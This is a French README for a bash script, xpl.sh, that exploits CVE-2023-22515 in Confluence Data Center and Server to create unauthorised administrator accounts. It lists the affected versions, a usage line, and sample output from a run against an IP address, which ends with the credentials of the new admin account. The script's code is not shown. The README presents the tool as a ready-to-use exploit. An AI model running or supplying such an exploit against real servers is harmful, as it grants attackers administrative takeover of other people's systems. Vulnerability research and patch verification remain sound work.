
# Script Bash qui exploite CVE-2023-22515 dans Confluence Data Center et Server pour créer des comptes administrateur non autorisés, permettant un accès non autorisé.
Un script d'exploitation simple en bash pour CVE-2023-22515.
Les instances Confluence Data Center et Server présentent une vulnérabilité de contrôle d'accès cassé (CVE-2023-22515), permettant aux attaquants de créer des comptes administrateur Confluence non autorisés et d'accéder aux instances Confluence.
8.0.0
8.0.1
8.0.2
8.0.3
8.0.4
8.1.0
8.1.1
8.1.3
8.1.4
8.2.0
8.2.1
8.2.2
8.2.3
8.3.0
8.3.1
8.3.2
8.4.0
8.4.1
8.4.2
8.5.0
8.5.1
./xpl.sh [URL]
└─$ ./xpl.sh http://10.10.76.38:8090
[INFO] Vérification si l'hôte est vulnérable...
Vulnérable --> Code de réponse : 200
[+] Exploitation de la cible...
[+] Exploit terminé !!!
[INFO] Utilisateur créé : a123456
[INFO] Mot de passe créé : ChangeMe123